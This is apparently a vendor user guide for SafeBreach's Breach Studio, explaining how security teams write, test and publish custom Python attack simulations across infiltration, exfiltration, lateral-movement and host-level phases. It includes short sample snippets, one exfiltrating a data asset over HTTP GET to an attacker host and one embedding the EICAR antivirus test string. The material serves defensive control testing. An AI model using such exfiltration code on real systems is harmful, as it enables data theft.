Breach Studio Guide

Breach Studio Guide

Table of Contents
Breach Studio - Overview ....................................................................................................... 3
Who can Benefit ............................................................................................................ 3
Supported Types of Custom Breach Methods ................................................................... 3
Prerequisites and Limitations .......................................................................................... 3
Risks ............................................................................................................................. 4
Understanding Attack Phases .......................................................................................... 4
Infiltration ............................................................................................................. 4
Exfiltration ............................................................................................................. 4
Lateral Movement .................................................................................................. 5
Host Level ............................................................................................................. 5
Managing Custom Breach Methods ................................................................................. 6
Create a Custom Breach Method ............................................................................. 6
Test the Custom Breach Method ............................................................................. 7
Edit the Custom Breach Method .............................................................................. 8
Publish to the Playbook .......................................................................................... 9
Run the Custom Content ........................................................................................ 9
How SafeBreach Calculates the Simulation Result ........................................................... 10
For Network Simulations ...................................................................................... 10
For Host Simulations ............................................................................................ 10
Creating Python Custom Breach Methods .............................................................................. 11
Python Custom Breach Method Parameters ................................................................... 11
Writing Python Scripts for Custom Breach Methods ....................................................... 12
The SafeBreach Framework API: Functions and Parameters ..................................... 13
Python Limitations and Supported Python Libraries ................................................ 15

2
 Breach Studio Guide

Breach Studio - Overview

Breach Studio allows customers to get additional value from the SafeBreach platform by creating custom
content, testing it and extending the Playbook. Custom breach methods may be run automatically and
continuously.

NOTE
Breach Studio is supported as of version 2019Q2.3

Who can Benefit

The Breach Studio is for:

• Red Teams - Leverage SafeBreach as an automation platform for running custom breach methods.
• Blue / Purple Teams - Extend the Playbook with customer-specific custom breach methods to validate
their security controls.

Supported Types of Custom Breach Methods

Currently we support Python-based custom breach methods. Users can write any code, considering the
limitations and risks described below.

With SafeBreach, breach methods are categorized in one of four attack phases [4]. Every custom
breach method is assigned an attack phase. This influences how the custom content is represented in
and handled by the system.

Prerequisites and Limitations

The following are known limitations for creating custom breach methods:

• For network breach methods, at least two simulators are required to run the simulation. For host level
breach methods, one is sufficient.
• For infiltration breach methods, at least one simulator must have the Infiltration Simulator role as-
signed to it.
• For lateral movement breach methods, the two simulators must not have the role of Infiltration or
Exfiltration Simulator assigned.
• For exfiltration breach methods, at least one simulator with data assets is required.
• When using operating system constraints, make sure that the selected simulators have the required
operating systems.
• The duration of a custom breach method simulation is limited to 30 seconds for network breach meth-
ods and 5 minutes for host level breach methods. If the duration exceeds the timeout period, the simu-
lation is considered "blocked."

NOTE
The roles of simulators is configured in Settings. For more information, see Fine-tuning
the simulator role and other settings.

3
 Breach Studio Guide

Risks
SafeBreach does not review or validate the custom breach methods for risky behavior, which may per-
form actions that can damage components involved in the simulations or other entities in the Customer's
network. Use of the Breach Studio is entirely at the Customer's discretion and risk. For more information,
please review the SafeBreach terms and conditions.

NOTE
SafeBreach recommends to test custom breach methods on non-production simulators
first, to minimize risk during the development cycle.

Understanding Attack Phases

SafeBreach Research Lab creates the playbook of breach methods to test enterprise networks against
threats to security. Red teams and other security professionals can use SafeBreach to author their own
custom breach methods.

Here are the four categories of breach methods, based on the different attack phases:

• Infiltration: The attacker is an external simulator that tries to attack the internal target simulator.
• Exfiltration: The attacker is an external or other simulator that tries to receivedata leaked from the in-
ternal target simulator.
• Lateral Movement: The attacker is an internal simulator that tries to attack the target simulator within
the network.
• Host Level: Malicious host-level actions are simulated on the target simulator (endpoint).

For more information, see How Breach Methods are Categorized.

Infiltration
Simulating an infiltration attack involves a breach method with two simulators. The attacker is an exter-
nal simulator that tries to attack the internal target simulator.

Examples
Sample attack types that users can create are: URL Navigation, Malicious Domain Resolution, Server
Communication, Brute Force, Denial of Service, Remote Command Execution, Remote Server Exploita-
tion, Malicious Payload Transfer, and more.

Prerequisites
For running an infiltration breach method, the following settings are required:

• an infiltration simulator that plays the role of the attacker

Use Settings to define a simulator as an infiltration simulator.
• a simulator within the segment that is being tested, that plays the role of the target

Plans that Include Infiltration Breach Methods

All methods, Infiltration

Exfiltration
Simulating an exfiltration attack involves a breach method with two simulators. The attacker is an exter-
nal or other simulator that receives data leaked from the internal target simulator. Leakage of different

4
 Breach Studio Guide

data assets can be simulated over various protocols, using multiple techniques that exploit components
of those protocols.

Examples
Exfiltration via FTP STOR (Binary), Data assets exfiltration over BOOTP, and Data Exfiltration via DNS
Tunneling

Prerequisites
For running an exfiltration method, the following settings are required:

• An exfiltration simulator that plays the role of the attacker for scenarios involving exfiltration out of the
networkand / or another simulator in the network to simulate exfiltration from one computer in the
network to another
Use Settings to define a simulator as an exfiltration simulator
• A simulator with data assets within the segment that is being tested, that plays the role of the target.

Plans that Include Exfiltration Breach Methods

All methods, Exfiltration

Lateral Movement
Lateral movement simulated attacks move through a network in search of data assets. They may also
attempt other forms of damage.

Examples
Sample attack types that users can create include: Brute Force, Denial of Service, Remote Command Exe-
cution, Remote Server Exploitation, Malicious Payload Transfer, and more.

Prerequisites
Two simulators are required. They both must not have an infiltration or exfiltration role.

Plans that Include Lateral Movement Breach Methods

All methods, Lateral Movement

Host Level
Host level breach methods simulate gaining access to, altering, or copying data.

Examples
Sample attack types that users can create include: Drop of Malicious Payload to Disk, Data Collection,
Script Execution, OS Configuration Change, File System Manipulation, and more. Note that impersona-
ted users can only be used in host-level breach methods.

Prerequisites
One simulator is required. It must not have an infiltration or exfiltration role.

Plans that Include Host Level Breach Methods

All methods, Host-level

5
 Breach Studio Guide

Managing Custom Breach Methods

Breach Studio allows users to manage custom breach methods with the following steps:

1. Create - Define the details and all required parameters

2. Test - Run and validate the custom breach method on selected simulators
3. Edit- View, update, and delete the custom content
4. Publish - Extend the Playbook by publishing the custom breach method
5. Run - Simulate published custom content

Create a Custom Breach Method

1. Select the type of custom breach method to create, for example, Create from Python.

2. Fill in the form with details and parameters.

See Python Custom Breach Method Parameters [11] for the parameters required for creating a py-
thon custom breach method.
3. Once the parameters have been filled in correctly, click Save as Draft.

6
 Breach Studio Guide

Test the Custom Breach Method

1. Run a test for all simulators or select which simulators to use.

2. Change the selected simulators and, if desired, rename the test and then either click:
• Run now - Sends the test to the front of the queue to be run immediately
• Add to queue - Sends the test to the end of the queue to be run after the other tests in the queue
are run

3. View the test results

NOTE
These results only appear in the Breach Studio.

4. Drill down on a single result to view the STDOUT and STDERR for the simulator(s).

7
 Breach Studio Guide

5. If required, correct the Python code and upload it again.

Edit the Custom Breach Method

• To view a custom breach method, click Open Recent or select from the left pane lists.

8
 Breach Studio Guide

• To update the custom breach method parameters, select it, edit the applicable fields, and save.

NOTE
You can save a draft method as a draft or publish it to the Playbook. Breach methods
that have already been published may only be saved as published breach methods.

• After selecting a custom breach method, you can delete it by clicking

Publish to the Playbook

Once you have carefully tested the breach method, Publish it to include it in the Playbook.

NOTE
Published custom breach methods behave the same way as prepackaged breach meth-
ods: They can be run from the Playbook, are automatically included in Plans based on
their attack phase and custom attack type, and they can be included in custom plans
(For instructions, see Planning and Managing Playbook Methods for Simulations.

Run the Custom Content

You can find all the custom breach methods using the Attack Type: Custom filter on the following pages:

• Planning
• Playbook
• Simulations Results

9
 Breach Studio Guide

How SafeBreach Calculates the Simulation Result

SafeBreach determines whether or not a simulation was blocked or not-blocked using different criteria
for network and host simulations.

For Network Simulations

A simulation is considered not-blocked in one of the following cases:

• When the simulation involves a transfer of a payload, the attacker and target simulators report the
hash of the send and receive payload as the final function of the simulation to SafeBreach Manage-
ment. If the hashes match. If they do, the simulation is not-blocked.
Sample of the target simulator code for actions at the end of the simulation

# Sends an innocent HTTP GET request to the provided URL.

# The response will contain a malicious file.
# The content of the response is accessible via state['DATA'].
http_get(state, url)
return state['DATA']

Sample of the attacker simulator code for the actions at the end of the simulation

# Base-64 encoded content of EICAR anti-virus test file.

BUFFER = 'WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNUL
...
return base64.b64decode(BUFFER)
• For other types of network simulations, the simulation is considered not-blocked when it finishes suc-
cessfully, without any exceptions and both simulators report True as a return value.

return True

For Host Simulations

For host simulations, the result is considered not-blocked when it finishes successfully, without any ex-
ceptions.

10
 Breach Studio Guide

Creating Python Custom Breach Methods

Python Custom Breach Method Parameters

Once you select Create from Python, a form opens. Fill in the form and then save it. For an overview of
the process, see Managing Custom Breach Methods [6]

Parameters

Name The Breach Method name, for example, “Malicious File Downloaded using an
HTTP GET Request”
Description Typically, the description includes the following information.
Goal What is this simulation trying to verify?
Actions What does the simulation do in order to achieve the
goal?
Expected behavior How should the security mechanisms work in order
to protect against this breach method?
More Info Other information that may be useful in under-
standing the breach method is provided here.
Attack Phase Select the Attack Phase of the breach method.
See Understanding Attack Phases [4] for an explanation of the infiltration, exfil-
tration, lateral movement, and host-level attack phases.
Attack Type The default attack type is Custom. It is not editable.
Impersonated users Toggle the switch to enable or disable the use of impersonated users with this
custom breach method. For instructions, see Setting Up Impersonated Users for
Simulating Breach Methods.
Attacker OS Specify the attacker OS constraint so the custom breach method will only use
simulators having this operating system. The options are: Any OS, Windows,
Linux, macOS.
Target OS Specify the target OS constraint so the custom breach method will only use
simulators having this operating system. The options are: Any OS, Windows,
Linux, macOS.

11
 Breach Studio Guide

Attacker Code Upload the Python script file that will be executed on the attacker simulator.

NOTE
See Using Python Scripts for Custom Breach Methods for more
on preparing the Python script.

Target Code Upload the Python script file that will be executed on the target simulator.

NOTE
See Using Python Scripts for Custom Breach Methods for more
on preparing the Python script.

NOTE
You can download sample Python scripts here.

Host Level breach methods only involve one simulator which plays the role of the tar-
get.

Infiltration, Exfiltration, and Lateral Movement breach methods involve two simulators.

Writing Python Scripts for Custom Breach Methods

You can write a Python script for a custom breach method using Supported Python libraries [15] as well
as SafeBreach Framework API functions.

12
 Breach Studio Guide

The SafeBreach Framework API: Functions and Parameters

The Main Function
Each Python script must include the main function with SafeBreach supported parameters in the func-
tion signature.

Signature

main(system_data, asset, proxy, *args, **kwargs)

This is the main function of the simulation. Only the code written inside this function will be executed
during the simulation.

The Parameters

system_data
The system_data parameter is a dictionary that contains the IP addresses of the simulators running the
current breach method, during runtime. The following are the available iP addresses:

• system_data['target_external_ip'] - The observed IP of the target simulator by SafeBreach Management

• system_data['target_internal_ip'] - The IP of the target simulator reported by the target simulator to
SafeBreach Management
• system_data['attacker_external_ip'] - The observed IP of the attacker simulator by SafeBreach Manage-
ment
• system_data['attacker_internal_ip'] - The IP of the attacker simulator reported by the attacker simulator
to SafeBreach Management

asset
When simulating exfiltration breach methods, the asset parameter will contain the data asset to exfil-
trate.

NOTE
The asset parameter is only relevant for Exfiltration attack phase breach methods.

Sample Usage

# SafeBreach modules.
from framework import SafeBreachData
from framework.red.http import http_get

# Provides dynamic capabilities to framework modules.

state = SafeBreachData(asset)

# Exfiltrates asset using an HTTP GET request to the provided URL.

print "Exfiltrating asset to %s:%s" % (attacker_hostname, PORT)
http_get(state, url)

# Returns the sent asset for comparison with received asset.

# This determines the result of the move.
return asset

13
 Breach Studio Guide

proxy

NOTE
The proxy parameter is only relevant for network simulations, including infiltration,
exfiltration, and lateral movement breach methods.

The proxy parameter is a dictionary that contains the proxy information required for running simula-
tions with proxies, including:

• proxy['host'] - The host name or IP address of the proxy

• proxy['protocol'] - The protocol used to connect to the proxy
• proxy['port'] - The port used to connect to the proxy
• proxy['username'] - The username used to authenticate to the proxy
• proxy['password'] - The password used to authenticate to the proxy

Proxies are defined in the Settings screen. For more information about setting up a proxy server, see
Setting up the Proxy Servers for Simulating Breaches.

When defining a breach with a proxy, the proxy details from Settings will be available. Use them in your
custom breach methods.

Please note that your breach will always run with and without the proxy details, so its value can be
"None".

Sample Usage

# SafeBreach modules.
from framework.proxies import add_proxy
from framework.red.http import http_get

# Adds proxy information to state, All sequential operation will consider

# this value before initiating communication.
add_proxy(state, proxy)

# Exfiltrates asset using an HTTP GET request to the provided URL.

http_get(state, url)

SafeBreach Special Objects

SafeBreachData
A dictionary that saves the state and is used mainly by the system

ServiceStarter
An auxiliary class that provides the capability of starting a Windows service by name

Helper Functions

Sync Mechanism
Sometimes the scripts of the attacker and target simulators should be synced in order to perform syn-
chronous actions such as waiting for a network request / response and only then continuing execution.
Use the following functions for this.

14
 Breach Studio Guide

framework.wait()
The framework.wait() sync mechanism is a blocking function that suspends the simulation until the
framework.ready event is received from the other simulator.

framework.ready()
The framework.ready() sync mechanism sends the framework.ready event to the other simulator
notifying that the simulation can proceed.

Other Functions
The following components can be used in Python scripts.

http_get(state, url)
Performs an HTTP GET request.

Import

from framework.red.http import http_get

Parameters

• state – special safebreach state object

• url – destination url for the http request

open_or_die(state, file_path)
Checks whether a file can be opened for reading. Usually used to check for malicious files on a disk when
AV software is installed that would delete the file.

Import

from framework.endpoint.windows.safe_actions.actions.verify_file import

open_or_die

Parameters

• state – special safebreach state object

• file_path– the path to the file to check

add_proxy(state, proxy)
Adds proxy information to state. All sequential network operations will consider proxy information be-
fore initiating communication.

Import

from framework.proxies import add_proxy

Parameters

• state - special safebreach state object

• proxy - the proxy object from the Main function arguments

Python Limitations and Supported Python Libraries

This article lists the current known limitations and third party libraries supported for creating custom
breach methods.

Python Limitations and Important Information

The following limitations and important information applies for Python scripts.

15
 Breach Studio Guide

• Every script is executed as a separate process as root / System or as an impersonated user (when
defined in the system). For more information, see Setting Up Impersonated Users for Simulating Breach
Methods.
• Python scripts run in the Python virtual environment. They can only use Python standard and other
supported libraries (see below).
• A python script runs as part of a single breach method with a single set of parameters, for example,
one specific port or protocol. If multiple variations are required, create a separate breach method with
its corresponding python script for each variation.
• Each Python script file is limited to 10MB.

Supported Python Libraries

The following third party libraries are supported for creating custom breach methods.

requests==2.9.1
dnslib==0.9.3
fake-factory==0.4.0
impacket==0.9.15
ipaddress==1.0.19
netaddr==0.7.18
netifaces==0.10.6
networkx==1.11
psutil==3.3.0
pycurl==7.43.0
pyOpenSSL==17.5.0
pysnmp==4.2.5
PySocks==1.6.8
tftpy==0.6.2

16